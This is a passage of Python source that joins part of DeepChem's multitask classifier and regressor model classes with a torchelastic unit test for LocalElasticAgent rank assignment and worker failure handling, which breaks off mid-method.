dataset: dc.data.Dataset
Dataset to make prediction on
transformers: list
List of dc.trans.Transformers.
outputs: object
If outputs is None, then will assume outputs = self.outputs[0] (single
output). If outputs is a Layer/Tensor, then will evaluate and return as a
single ndarray. If outputs is a list of Layers/Tensors, will return a list
of ndarrays.
Returns
-------
y_pred: numpy ndarray or list of numpy ndarrays
"""
# Results is of shape (n_samples, n_tasks, n_classes)
retval = super(TensorGraphMultiTaskClassifier, self).predict(
dataset, transformers, outputs)
# retval is of shape (n_samples, n_tasks)
return np.argmax(retval, axis=2)
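# A minimal end-to-end sketch for the classifier above (standard TensorGraph
# fit/predict API; shapes and hyperparameters are illustrative):
#
#   X = np.random.rand(10, 100)
#   y = np.random.randint(2, size=(10, 3))
#   dataset = dc.data.NumpyDataset(X, y)
#   model = TensorGraphMultiTaskClassifier(n_tasks=3, n_features=100,
#                                          layer_sizes=[500], dropouts=0.25)
#   model.fit(dataset, nb_epoch=10)
#   y_pred = model.predict(dataset)   # (10, 3) array of class indices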
class TensorGraphMultiTaskRegressor(TensorGraph):
def __init__(self,
n_tasks,
n_features,
layer_sizes=[1000],
weight_init_stddevs=0.02,
bias_init_consts=1.0,
weight_decay_penalty=0.0,
weight_decay_penalty_type="l2",
dropouts=0.5,
activation_fns=tf.nn.relu,
**kwargs):
"""Create a TensorGraphMultiTaskRegressor.
In addition to the following arguments, this class also accepts all the keyword arguments
from TensorGraph.
Parameters
----------
n_tasks: int
number of tasks
n_features: int
number of features
layer_sizes: list
the size of each dense layer in the network. The length of this list determines the number of layers.
weight_init_stddevs: list or float
the standard deviation of the distribution to use for weight initialization of each layer. The length
of this list should equal len(layer_sizes)+1. The final element corresponds to the output layer.
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
bias_init_consts: list or float
the value to initialize the biases in each layer to. The length of this list should equal len(layer_sizes)+1.
The final element corresponds to the output layer. Alternatively this may be a single value instead of a list,
in which case the same value is used for every layer.
weight_decay_penalty: float
the magnitude of the weight decay penalty to use
weight_decay_penalty_type: str
the type of penalty to use for weight decay, either 'l1' or 'l2'
dropouts: list or float
the dropout probability to use for each layer. The length of this list should equal len(layer_sizes).
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
activation_fns: list or object
the Tensorflow activation function to apply to each layer. The length of this list should equal
len(layer_sizes). Alternatively this may be a single value instead of a list, in which case the
same value is used for every layer.
"""
super(TensorGraphMultiTaskRegressor, self).__init__(**kwargs)
self.n_tasks = n_tasks
self.n_features = n_features
n_layers = len(layer_sizes)
if not isinstance(weight_init_stddevs, collections.Sequence):
weight_init_stddevs = [weight_init_stddevs] * (n_layers + 1)
if not isinstance(bias_init_consts, collections.Sequence):
bias_init_consts = [bias_init_consts] * (n_layers + 1)
if not isinstance(dropouts, collections.Sequence):
dropouts = [dropouts] * n_layers
if not isinstance(activation_fns, collections.Sequence):
activation_fns = [activation_fns] * n_layers
# Add the input features.
mol_features = Feature(shape=(None, n_features))
prev_layer = mol_features
# Add the dense layers
for size, weight_stddev, bias_const, dropout, activation_fn in zip(
layer_sizes, weight_init_stddevs, bias_init_consts, dropouts,
activation_fns):
layer = Dense(
in_layers=[prev_layer],
out_channels=size,
activation_fn=activation_fn,
weights_initializer=TFWrapper(
tf.truncated_normal_initializer, stddev=weight_stddev),
biases_initializer=TFWrapper(
tf.constant_initializer, value=bias_const))
if dropout > 0.0:
layer = Dropout(dropout, in_layers=[layer])
prev_layer = layer
# Compute the loss function for each label.
output = Reshape(
shape=(-1, n_tasks, 1),
in_layers=[
Dense(
in_layers=[prev_layer],
out_channels=n_tasks,
weights_initializer=TFWrapper(
tf.truncated_normal_initializer,
stddev=weight_init_stddevs[-1]),
biases_initializer=TFWrapper(
tf.constant_initializer, value=bias_init_consts[-1]))
])
self.add_output(output)
labels = Label(shape=(None, n_tasks, 1))
weights = Weights(shape=(None, n_tasks))
loss = L2Loss(in_layers=[labels, output])
weighted_loss = WeightedError(in_layers=[loss, weights])
if weight_decay_penalty != 0.0:
weighted_loss = WeightDecay(
weight_decay_penalty,
weight_decay_penalty_type,
in_layers=[weighted_loss])
self.set_loss(weighted_loss)
def default_generator(self,
dataset,
epochs=1,
predict=False,
deterministic=True,
pad_batches=True):
for epoch in range(epochs):
for (X_b, y_b, w_b, ids_b) in dataset.iterbatches(
batch_size=self.batch_size,
deterministic=deterministic,
pad_batches=pad_batches):
feed_dict = dict()
if y_b is not None and not predict:
feed_dict[self.labels[0]] = y_b.reshape(-1, self.n_tasks, 1)
if X_b is not None:
feed_dict[self.features[0]] = X_b
if w_b is not None and not predict:
feed_dict[self.task_weights[0]] = w_b
yield feed_dict
class TensorGraphMultiTaskFitTransformRegressor(TensorGraphMultiTaskRegressor):
"""Implements a TensorGraphMultiTaskRegressor that performs on-the-fly transformation during fit/predict.
Example:
>>> n_samples = 10
>>> n_features = 3
>>> n_tasks = 1
>>> ids = np.arange(n_samples)
>>> X = np.random.rand(n_samples, n_features, n_features)
>>> y = np.zeros((n_samples, n_tasks))
>>> w = np.ones((n_samples, n_tasks))
>>> dataset = dc.data.NumpyDataset(X, y, w, ids)
>>> fit_transformers = [dc.trans.CoulombFitTransformer(dataset)]
>>> model = dc.models.TensorflowMultiTaskFitTransformRegressor(n_tasks, [n_features, n_features],
... dropouts=[0.], learning_rate=0.003, weight_init_stddevs=[np.sqrt(6)/np.sqrt(1000)],
... batch_size=n_samples, fit_transformers=fit_transformers, n_evals=1)
n_features after fit_transform: 12
"""
def __init__(self,
n_tasks,
n_features,
fit_transformers=[],
n_evals=1,
batch_size=50,
**kwargs):
"""Create a TensorGraphMultiTaskFitTransformRegressor.
In addition to the following arguments, this class also accepts all the keyword arguments
from TensorGraphMultiTaskRegressor.
Parameters
----------
n_tasks: int
number of tasks
n_features: list or int
number of features
fit_transformers: list
List of dc.trans.FitTransformer objects
n_evals: int
Number of evaluations per example at predict time
"""
self.fit_transformers = fit_transformers
self.n_evals = n_evals
# Run fit transformers on dummy dataset to determine n_features after transformation
if isinstance(n_features, list):
X_b = np.ones([batch_size] + n_features)
elif isinstance(n_features, int):
X_b = np.ones([batch_size, n_features])
else:
raise ValueError("n_features should be list or int")
for transformer in fit_transformers:
X_b = transformer.X_transform(X_b)
n_features = X_b.shape[1]
print("n_features after fit_transform: %d" % int(n_features))
super(TensorGraphMultiTaskFitTransformRegressor, self).__init__(
n_tasks, n_features, batch_size=batch_size, **kwargs)
def default_generator(self,
dataset,
epochs=1,
predict=False,
deterministic=True,
pad_batches=True):
for epoch in range(epochs):
for (X_b, y_b, w_b, ids_b) in dataset.iterbatches(
batch_size=self.batch_size,
deterministic=deterministic,
pad_batches=pad_batches):
feed_dict = dict()
if y_b is not None and not predict:
feed_dict[self.labels[0]] = y_b.reshape(-1, self.n_tasks, 1)
if X_b is not None:
if not predict:
for transformer in self.fit_transformers:
X_b = transformer.X_transform(X_b)
feed_dict[self.features[0]] = X_b
if w_b is not None and not predict:
feed_dict[self.task_weights[0]] = w_b
yield feed_dict
def predict_on_generator(self, generator, transformers=[], outputs=None):
def transform_generator():
for feed_dict in generator:
X = feed_dict[self.features[0]]
for i in range(self.n_evals):
X_t = X
for transformer in self.fit_transformers:
X_t = transformer.X_transform(X_t)
feed_dict[self.features[0]] = X_t
yield feed_dict
return super(TensorGraphMultiTaskFitTransformRegressor,
self).predict_on_generator(transform_generator(), transformers,
outputs)
class TensorflowMultiTaskClassifier(TensorflowClassifier):
"""Implements an icml model as configured in a model_config.proto."""
def build(self, graph, name_scopes, training):
"""Constructs the graph architecture as specified in its config.
This method creates the following Placeholders:
mol_features: Molecule descriptor (e.g. fingerprint) tensor with shape
batch_size x n_features.
"""
warnings.warn("TensorflowMultiTaskClassifier is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
placeholder_scope = TensorflowGraph.get_placeholder_scope(
graph, name_scopes)
n_features = self.n_features
with graph.as_default():
with placeholder_scope:
mol_features = tf.placeholder(
tf.float32, shape=[None, n_features], name='mol_features')
layer_sizes = self.layer_sizes
weight_init_stddevs = self.weight_init_stddevs
bias_init_consts = self.bias_init_consts
dropouts = self.dropouts
lengths_set = {
len(layer_sizes),
len(weight_init_stddevs),
len(bias_init_consts),
len(dropouts),
}
assert len(lengths_set) == 1, 'All layer params must have same length.'
n_layers = lengths_set.pop()
assert n_layers > 0, 'Must have some layers defined.'
label_placeholders = self.add_label_placeholders(graph, name_scopes)
weight_placeholders = self.add_example_weight_placeholders(
graph, name_scopes)
if training:
graph.queue = tf.FIFOQueue(
capacity=5,
dtypes=[tf.float32] *
(len(label_placeholders) + len(weight_placeholders) + 1))
graph.enqueue = graph.queue.enqueue([mol_features] + label_placeholders
+ weight_placeholders)
queue_outputs = graph.queue.dequeue()
labels = queue_outputs[1:len(label_placeholders) + 1]
weights = queue_outputs[len(label_placeholders) + 1:]
prev_layer = queue_outputs[0]
else:
labels = label_placeholders
weights = weight_placeholders
prev_layer = mol_features
prev_layer_size = n_features
for i in range(n_layers):
layer = tf.nn.relu(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, layer_sizes[i]],
stddev=weight_init_stddevs[i]),
bias_init=tf.constant(
value=bias_init_consts[i], shape=[layer_sizes[i]])))
layer = model_ops.dropout(layer, dropouts[i], training)
prev_layer = layer
prev_layer_size = layer_sizes[i]
output = model_ops.multitask_logits(layer, self.n_tasks)
return (output, labels, weights)
def construct_feed_dict(self, X_b, y_b=None, w_b=None, ids_b=None):
"""Construct a feed dictionary from minibatch data.
TODO(rbharath): ids_b is not used here. Can we remove it?
Args:
X_b: np.ndarray of shape (batch_size, n_features)
y_b: np.ndarray of shape (batch_size, n_tasks)
w_b: np.ndarray of shape (batch_size, n_tasks)
ids_b: List of length (batch_size) with datapoint identifiers.
"""
orig_dict = {}
orig_dict["mol_features"] = X_b
for task in range(self.n_tasks):
if y_b is not None:
orig_dict["labels_%d" % task] = to_one_hot(y_b[:, task])
else:
# Dummy placeholders
orig_dict["labels_%d" %
task] = np.squeeze(to_one_hot(np.zeros((self.batch_size,))))
if w_b is not None:
orig_dict["weights_%d" % task] = w_b[:, task]
else:
# Dummy placeholders
orig_dict["weights_%d" % task] = np.ones((self.batch_size,))
return TensorflowGraph.get_feed_dict(orig_dict)
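# --- A minimal sketch (not part of the original DeepChem source) showing the
# shape contract construct_feed_dict relies on: labels become one-hot
# (batch_size, 2) arrays per task while weights stay (batch_size,). The local
# _to_one_hot helper is an assumption standing in for deepchem's to_one_hot.
def _feed_dict_shapes_demo():
    import numpy as np

    def _to_one_hot(y, n_classes=2):
        # Map integer class labels to one-hot rows.
        out = np.zeros((len(y), n_classes))
        out[np.arange(len(y)), y.astype(int)] = 1
        return out

    batch_size, n_tasks = 4, 3
    y_b = np.random.randint(2, size=(batch_size, n_tasks))
    w_b = np.ones((batch_size, n_tasks))
    for task in range(n_tasks):
        labels = _to_one_hot(y_b[:, task])  # per-task one-hot labels
        weights = w_b[:, task]              # per-task example weights
        assert labels.shape == (batch_size, 2)
        assert weights.shape == (batch_size,)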
class TensorflowMultiTaskRegressor(TensorflowRegressor):
"""Implements an icml model as configured in a model_config.proto."""
def build(self, graph, name_scopes, training):
"""Constructs the graph architecture as specified in its config.
This method creates the following Placeholders:
mol_features: Molecule descriptor (e.g. fingerprint) tensor with shape
batch_size x n_features.
"""
warnings.warn("TensorflowMultiTaskRegressor is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
n_features = self.n_features
placeholder_scope = TensorflowGraph.get_placeholder_scope(
graph, name_scopes)
with graph.as_default():
with placeholder_scope:
mol_features = tf.placeholder(
tf.float32, shape=[None, n_features], name='mol_features')
layer_sizes = self.layer_sizes
weight_init_stddevs = self.weight_init_stddevs
bias_init_consts = self.bias_init_consts
dropouts = self.dropouts
lengths_set = {
len(layer_sizes),
len(weight_init_stddevs),
len(bias_init_consts),
len(dropouts),
}
assert len(lengths_set) == 1, 'All layer params must have same length.'
n_layers = lengths_set.pop()
assert n_layers > 0, 'Must have some layers defined.'
label_placeholders = self.add_label_placeholders(graph, name_scopes)
weight_placeholders = self.add_example_weight_placeholders(
graph, name_scopes)
if training:
graph.queue = tf.FIFOQueue(
capacity=5,
dtypes=[tf.float32] *
(len(label_placeholders) + len(weight_placeholders) + 1))
graph.enqueue = graph.queue.enqueue([mol_features] + label_placeholders
+ weight_placeholders)
queue_outputs = graph.queue.dequeue()
labels = queue_outputs[1:len(label_placeholders) + 1]
weights = queue_outputs[len(label_placeholders) + 1:]
prev_layer = queue_outputs[0]
else:
labels = label_placeholders
weights = weight_placeholders
prev_layer = mol_features
prev_layer_size = n_features
for i in range(n_layers):
layer = tf.nn.relu(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, layer_sizes[i]],
stddev=weight_init_stddevs[i]),
bias_init=tf.constant(
value=bias_init_consts[i], shape=[layer_sizes[i]])))
layer = model_ops.dropout(layer, dropouts[i], training)
prev_layer = layer
prev_layer_size = layer_sizes[i]
output = []
for task in range(self.n_tasks):
output.append(
tf.squeeze(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, 1],
stddev=weight_init_stddevs[i]),
bias_init=tf.constant(value=bias_init_consts[i], shape=[1
]))))
return (output, labels, weights)
def construct_feed_dict(self, X_b, y_b=None, w_b=None, ids_b=None):
"""Construct a feed dictionary from minibatch data.
TODO(rbharath): ids_b is not used here. Can we remove it?
Args:
X_b: np.ndarray of shape (batch_size, n_features)
y_b: np.ndarray of shape (batch_size, n_tasks)
w_b: np.ndarray of shape (batch_size, n_tasks)
ids_b: List of length (batch_size) with datapoint identifiers.
"""
orig_dict = {}
orig_dict["mol_features"] = X_b
for task in range(self.n_tasks):
if y_b is not None:
orig_dict["labels_%d" % task] = y_b[:, task]
else:
# Dummy placeholders
orig_dict["labels_%d" % task] = np.squeeze(np.zeros((self.batch_size,)))
if w_b is not None:
orig_dict["weights_%d" % task] = w_b[:, task]
else:
# Dummy placeholders
orig_dict["weights_%d" % task] = np.ones((self.batch_size,))
return TensorflowGraph.get_feed_dict(orig_dict)
class TensorflowMultiTaskFitTransformRegressor(TensorflowMultiTaskRegressor):
"""Implements a TensorflowMultiTaskRegressor that performs on-the-fly transformation during fit/predict
Example:
>>> n_samples = 10
>>> n_features = 3
>>> n_tasks = 1
>>> ids = np.arange(n_samples)
>>> X = np.random.rand(n_samples, n_features, n_features)
>>> y = np.zeros((n_samples, n_tasks))
>>> w = np.ones((n_samples, n_tasks))
>>> dataset = dc.data.NumpyDataset(X, y, w, ids)
>>> fit_transformers = [dc.trans.CoulombFitTransformer(dataset)]
>>> model = dc.models.TensorflowMultiTaskFitTransformRegressor(n_tasks, [n_features, n_features],
... dropouts=[0.], learning_rate=0.003, weight_init_stddevs=[np.sqrt(6)/np.sqrt(1000)],
... batch_size=n_samples, fit_transformers=fit_transformers, n_evals=1)
n_features after fit_transform: 12
"""
def __init__(self,
n_tasks,
n_features,
logdir=None,
layer_sizes=[1000],
weight_init_stddevs=[.02],
bias_init_consts=[1.],
penalty=0.0,
penalty_type="l2",
dropouts=[0.5],
learning_rate=0.002,
momentum=.8,
optimizer="adam",
batch_size=50,
fit_transformers=[],
n_evals=1,
verbose=True,
seed=None,
**kwargs):
"""Initialize TensorflowMultiTaskFitTransformRegressor
Parameters
----------
n_tasks: int
Number of tasks
n_features: list or int
Number of features.
logdir: str
Location to save data
layer_sizes: list
List of layer sizes.
weight_init_stddevs: list
List of standard deviations for weights (sampled from zero-mean
gaussians). One for each layer.
bias_init_consts: list
List of bias initializations. One for each layer.
penalty: float
Amount of penalty (l2 or l1 applied)
penalty_type: str
Either "l2" or "l1"
dropouts: list
List of dropout amounts. One for each layer.
learning_rate: float
Learning rate for model.
momentum: float
Momentum. Only applied if optimizer=="momentum"
optimizer: str
Type of optimizer applied.
batch_size: int
Size of minibatches for training.
fit_transformers: list
List of dc.trans.FitTransformer objects
n_evals: int
Number of evaluations per example at predict time
verbose: bool
Perform logging.
seed: int
If not None, used as the random seed for TensorFlow.
"""
warnings.warn("TensorflowMultiTaskFitTransformRegressor "
"is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
self.fit_transformers = fit_transformers
self.n_evals = n_evals
# Run fit transformers on dummy dataset to determine n_features after transformation
if isinstance(n_features, list):
X_b = np.ones([batch_size] + n_features)
elif isinstance(n_features, int):
X_b = np.ones([batch_size, n_features])
else:
raise ValueError("n_features should be list or int")
for transformer in self.fit_transformers:
X_b = transformer.X_transform(X_b)
n_features = X_b.shape[1]
print("n_features after fit_transform: %d" % int(n_features))
TensorflowGraphModel.__init__(
self,
n_tasks,
n_features,
logdir=logdir,
layer_sizes=layer_sizes,
weight_init_stddevs=weight_init_stddevs,
bias_init_consts=bias_init_consts,
penalty=penalty,
penalty_type=penalty_type,
dropouts=dropouts,
learning_rate=learning_rate,
momentum=momentum,
optimizer=optimizer,
batch_size=batch_size,
pad_batches=False,
verbose=verbose,
seed=seed,
**kwargs)
def fit(self,
dataset,
nb_epoch=10,
max_checkpoints_to_keep=5,
log_every_N_batches=50,
checkpoint_interval=10,
**kwargs):
"""Perform fit transformations on each minibatch. Fit the model.
Parameters
----------
dataset: dc.data.Dataset
Dataset object holding training data
nb_epoch: int
Number of training epochs.
max_checkpoints_to_keep: int
Maximum number of checkpoints to keep; older checkpoints will be deleted.
log_every_N_batches: int
Report every N batches. Useful for training on very large datasets,
where epochs can take a long time to finish.
checkpoint_interval: int
Frequency at which to write checkpoints, measured in epochs
Raises
------
AssertionError
If model is not in training mode.
"""
############################################################## TIMING
time1 = time.time()
############################################################## TIMING
log("Training for %d epochs" % nb_epoch, self.verbose)
with self.train_graph.graph.as_default():
train_op = self.get_training_op(self.train_graph.graph,
self.train_graph.loss)
with self._get_shared_session(train=True) as sess:
sess.run(tf.global_variables_initializer())
saver = tf.train.Saver(max_to_keep=max_checkpoints_to_keep)
# Save an initial checkpoint.
saver.save(sess, self._save_path, global_step=0)
# Define the code that runs on a separate thread to feed data into the queue.
def enqueue(sess, dataset, nb_epoch, epoch_end_indices):
index = 0
for epoch in range(nb_epoch):
for X_b, y_b, w_b, ids_b in dataset.iterbatches(
self.batch_size, pad_batches=self.pad_batches):
for transformer in self.fit_transformers:
X_b = transformer.X_transform(X_b)
feed_dict = self.construct_feed_dict(X_b, y_b, w_b, ids_b)
sess.run(self.train_graph.graph.enqueue, feed_dict=feed_dict)
index += 1
epoch_end_indices.append(index)
sess.run(self.train_graph.graph.queue.close())
epoch_end_indices = []
enqueue_thread = threading.Thread(
target=enqueue, args=[sess, dataset, nb_epoch, epoch_end_indices])
enqueue_thread.daemon = True
enqueue_thread.start()
# Main training loop.
try:
epoch = 0
index = 0
index_in_epoch = 0
avg_loss = 0.0
while True:
if index_in_epoch % log_every_N_batches == 0:
log("On batch %d" % index_in_epoch, self.verbose)
# Run training op.
fetches = self.train_graph.output + [
train_op, self.train_graph.loss
]
fetched_values = sess.run(fetches)
loss = fetched_values[-1]
avg_loss += loss
index += 1
index_in_epoch += 1
if len(epoch_end_indices) > 0 and index >= epoch_end_indices[0]:
# We have reached the end of an epoch.
if epoch % checkpoint_interval == checkpoint_interval - 1:
saver.save(sess, self._save_path, global_step=epoch)
avg_loss = float(avg_loss) / index_in_epoch
log('Ending epoch %d: Average loss %g' % (epoch, avg_loss),
self.verbose)
epoch += 1
index_in_epoch = 0
avg_loss = 0.0
del epoch_end_indices[0]
except tf.errors.OutOfRangeError:
# We have reached the end of the data.
pass
# Always save a final checkpoint when complete.
saver.save(sess, self._save_path, global_step=epoch + 1)
############################################################## TIMING
time2 = time.time()
print("TIMING: model fitting took %0.3f s" % (time2 - time1), self.verbose)
############################################################## TIMING
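# --- A stdlib analogy (hedged; not the original TensorFlow code) for the
# producer/consumer pattern fit() uses above: a daemon thread enqueues batches
# into a bounded queue while the main loop consumes them, with a sentinel
# playing the role tf.errors.OutOfRangeError plays when the queue is closed.
def _enqueue_pattern_demo():
    import queue
    import threading as _threading

    q = queue.Queue(maxsize=5)  # mirrors tf.FIFOQueue(capacity=5)
    _DONE = object()            # sentinel standing in for queue.close()

    def producer(n_batches):
        for i in range(n_batches):
            q.put(("batch", i))  # blocks when the queue is full
        q.put(_DONE)

    t = _threading.Thread(target=producer, args=(10,))
    t.daemon = True
    t.start()
    consumed = 0
    while True:
        item = q.get()
        if item is _DONE:  # end of data, like OutOfRangeError
            break
        consumed += 1
    assert consumed == 10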
def predict_on_batch(self, X):
"""Return model output for the provided input. Each example is evaluated
self.n_evals times.
Restore(checkpoint) must have previously been called on this object.
Args:
X: np.ndarray of input features for this batch.
Returns:
A numpy array of model outputs with shape n_examples x n_tasks (x ...),
averaged over the self.n_evals evaluations.
Note that the output array may be more than 2D, e.g. for
classifier models that return class probabilities.
Raises:
AssertionError: If model is not in evaluation mode.
ValueError: If the model output has an unrecognized rank.
"""
X_evals = []
for i in range(self.n_evals):
X_t = X
for transformer in self.fit_transformers:
X_t = transformer.X_transform(X_t)
X_evals.append(X_t)
len_unpadded = len(X_t)
if self.pad_batches:
for i in range(self.n_evals):
X_evals[i] = pad_features(self.batch_size, X_evals[i])
if not self._restored_model:
self.restore()
with self.eval_graph.graph.as_default():
# run eval data through the model
n_tasks = self.n_tasks
outputs = []
with self._get_shared_session(train=False).as_default():
n_samples = len(X_evals[0])
for i in range(self.n_evals):
output = []
feed_dict = self.construct_feed_dict(X_evals[i])
data = self._get_shared_session(train=False).run(
self.eval_graph.output, feed_dict=feed_dict)
batch_outputs = np.asarray(data[:n_tasks], dtype=float)
# reshape to batch_size x n_tasks x ...
if batch_outputs.ndim == 3:
batch_outputs = batch_outputs.transpose((1, 0, 2))
elif batch_outputs.ndim == 2:
batch_outputs = batch_outputs.transpose((1, 0))
# Handle edge case when batch-size is 1.
elif batch_outputs.ndim == 1:
n_samples = len(X)
batch_outputs = batch_outputs.reshape((n_samples, n_tasks))
else:
raise ValueError('Unrecognized rank combination for output: %s' %
(batch_outputs.shape))
# Prune away any padding that was added
batch_outputs = batch_outputs[:n_samples]
output.append(batch_outputs)
outputs.append(np.squeeze(np.concatenate(output)))
outputs = np.mean(np.array(outputs), axis=0)
outputs = np.copy(outputs)
# Handle case of 0-dimensional scalar output
if len(outputs.shape) > 0:
return outputs[:len_unpadded]
else:
outputs = np.reshape(outputs, (1,))
return outputs
|
local_elastic_agent_test.py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import multiprocessing
import os
import time
import unittest
import uuid
from unittest.mock import patch
import torch
import torch.distributed as dist
import torch.distributed.rpc as rpc
import torchelastic.rendezvous.registry as rdzv_registry
from torch.distributed.rpc.backend_registry import BackendType
from torch.multiprocessing import ProcessRaisedException
from torchelastic.agent.server.api import (
WorkerGroupFailureException,
WorkerSpec,
WorkerState,
)
from torchelastic.agent.server.local_elastic_agent import LocalElasticAgent
from torchelastic.rendezvous import RendezvousParameters
from torchelastic.rendezvous.etcd_server import EtcdServer
from torchelastic.test.test_utils import is_asan_or_tsan, is_tsan
def _happy_function():
return
def _sad_function():
raise RuntimeError("sad because i throw")
def _fatal_signal_function(expected_error_index: int, sig: int):
rank = int(os.environ["RANK"])
if rank == expected_error_index:
os.kill(os.getpid(), sig)
def _bipolar_function():
rank = int(os.environ["RANK"])
if rank % 2 == 0:
_happy_function()
else:
_sad_function()
def _distributed_sum(wait):
rank = int(os.environ["RANK"])
world_size = int(os.environ["WORLD_SIZE"])
dist.init_process_group(backend="gloo")
t = torch.tensor(rank)
time.sleep(wait)
dist.all_reduce(t, op=dist.ReduceOp.SUM)
expected_sum = sum(range(world_size))
actual = t.item()
if expected_sum != actual:
raise RuntimeError(f"Expected rank sum {expected_sum}, got {actual}")
def _simulate_work(wait):
time.sleep(wait)
rank = int(os.environ["RANK"])
return rank
def _check_rank_assignment():
group_rank = int(os.environ["GROUP_RANK"])
rank = int(os.environ["RANK"])
world_size = int(os.environ["WORLD_SIZE"])
role_rank = int(os.environ["ROLE_RANK"])
role_world_size = int(os.environ["ROLE_WORLD_SIZE"])
return (group_rank, rank, world_size, role_rank, role_world_size)
def _get_env_var(env_var: str):
return os.environ[env_var]
def echo(msg):
return msg
def _return_rank_times(a):
return int(os.environ["RANK"]) * a
def _check_env_function():
# just check these env vars exist, os.environ[...] will naturally throw
# if the variable does not exist
os.environ["RANK"]
os.environ["LOCAL_RANK"]
os.environ["ROLE_RANK"]
os.environ["ROLE_NAME"]
os.environ["GROUP_RANK"]
os.environ["LOCAL_WORLD_SIZE"]
os.environ["ROLE_WORLD_SIZE"]
os.environ["WORLD_SIZE"]
os.environ["MASTER_ADDR"]
os.environ["MASTER_PORT"]
os.environ["TORCHELASTIC_RESTART_COUNT"]
os.environ["TORCHELASTIC_MAX_RESTARTS"]
os.environ["TORCHELASTIC_RUN_ID"]
def _run_agent(
run_id,
etcd_host,
etcd_port,
min_size,
max_size,
func_to_run,
args,
local_world_size=8,
role="test_trainer",
output_dict=None,
agent_barrier_timeout=300,
):
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint=f"{etcd_host}:{etcd_port}",
run_id=run_id,
min_nodes=min_size,
max_nodes=max_size,
)
rdzv_handler = rdzv_registry.get_rendezvous_handler(rdzv_params)
spec = WorkerSpec(
role=role,
local_world_size=local_world_size,
fn=func_to_run,
args=args,
rdzv_handler=rdzv_handler,
max_restarts=2,
monitor_interval=1,
)
agent = LocalElasticAgent(
spec, start_method="fork", exit_barrier_timeout=agent_barrier_timeout
)
res = agent.run()
if output_dict is not None:
key = str(uuid.uuid4().int)
output_dict[key] = (role, res)
class LocalElasticAgentTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
# start a standalone, single process etcd server to use for all tests
cls._etcd_server = EtcdServer()
cls._etcd_server.start()
@classmethod
def tearDownClass(cls):
# stop the standalone etcd server
cls._etcd_server.stop()
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_happy_function(self):
spec = self._get_worker_spec(fn=_happy_function)
agent = LocalElasticAgent(spec, start_method="fork")
agent.run()
def _get_worker_spec(
self,
fn=None,
cmd=None,
args=(),
max_restarts=1,
num_agents=1,
monitor_interval=0.1,
local_world_size=8,
):
run_id = str(uuid.uuid4().int)
rdzv_params = RendezvousParameters(
backend="etcd",
endpoint=f"{self._etcd_server.get_endpoint()}",
run_id=run_id,
min_nodes=num_agents,
max_nodes=num_agents,
)
rdzv_handler = rdzv_registry.get_rendezvous_handler(rdzv_params)
spec = WorkerSpec(
role="test_trainer",
local_world_size=local_world_size,
fn=fn,
cmd=cmd,
args=args,
rdzv_handler=rdzv_handler,
max_restarts=max_restarts,
monitor_interval=monitor_interval,
)
return spec
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_check_role_name(self):
spec = self._get_worker_spec(fn=_get_env_var, args=("ROLE_NAME",))
agent = LocalElasticAgent(spec, start_method="fork")
res = agent.run()
for role_name in res.values():
self.assertEqual(spec.role, role_name)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_run_distributed_sum(self):
spec = self._get_worker_spec(fn=_distributed_sum, args=(0,))
agent = LocalElasticAgent(spec, start_method="fork")
agent.run()
class RoleConfig:
__slots__ = ["role", "workers", "num_agents", "workers_num", "role_size"]
def __init__(
self, role: str, workers=None, num_agents: int = 0, workers_num: int = 0
):
self.role = role
self.workers = workers
if workers_num != 0 and num_agents != 0:
self.workers = [workers_num] * num_agents
self.role_size = sum(self.workers)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_correct_rank_assignment_heterogeneous(self):
roles_config = [
self.RoleConfig("trainer", workers=[1, 2, 3, 4]),
self.RoleConfig("ps", workers=[5, 2]),
# split configuration to run the last one on the main process
self.RoleConfig("master", workers=[8]),
]
self.run_configuration(roles_config, 25)
@unittest.skipIf(is_tsan(), "test incompatible with tsan")
def test_correct_rank_assignment_homogeneous(self):
num_workers = 4
roles_config = [
self.RoleConfig("trainer", num_agents=4, workers_num=num_workers),
self.RoleConfig("ps", num_agents=2, workers_num=num_workers),
# split configuration to run the last one on the main process
self.RoleConfig("master", num_agents=1, workers_num=num_workers),
]
self.run_configuration(roles_config, 28)
def run_configuration(self, roles_config, expected_world_size):
host = self._etcd_server.get_host()
port = self._etcd_server.get_port()
nnodes = sum(len(cfg.workers) for cfg in roles_config)
run_id = str(uuid.uuid4().int)
procs = []
manager = multiprocessing.Manager()
return_dict = manager.dict()
default_args = (run_id, host, port, nnodes, nnodes, _check_rank_assignment, ())
for ind in range(len(roles_config) - 1):
config = roles_config[ind]
for num_workers in config.workers:
p = multiprocessing.Process(
target=_run_agent,
args=(*default_args, num_workers, config.role, return_dict),
)
procs.append(p)
p.start()
# run one on the main process for debugging
config = roles_config[len(roles_config) - 1]
_run_agent(*default_args, config.workers[0], config.role, return_dict)
for i in range(nnodes - 1):
p = procs[i]
p.join()
self.assertEqual(0, p.exitcode)
role_info_dict = {role_info.role: role_info for role_info in roles_config}
self.verify_rank_consistency(return_dict, role_info_dict, expected_world_size)
def verify_rank_consistency(self, return_dict, role_info_dict, expected_world_size):
role_ranks = {}
global_ranks = []
grouped_ranks = {}
for role, res in return_dict.values():
for (
group_rank,
rank,
world_size,
role_rank,
role_world_size,
) in res.values():
role_info_config = role_info_dict[role]
self.assertEqual(expected_world_size, world_size)
self.assertEqual(role_info_config.role_size, role_world_size)
if group_rank not in grouped_ranks:
grouped_ranks[group_rank] = []
grouped_ranks[group_rank].append((rank, role_rank))
global_ranks.append(rank)
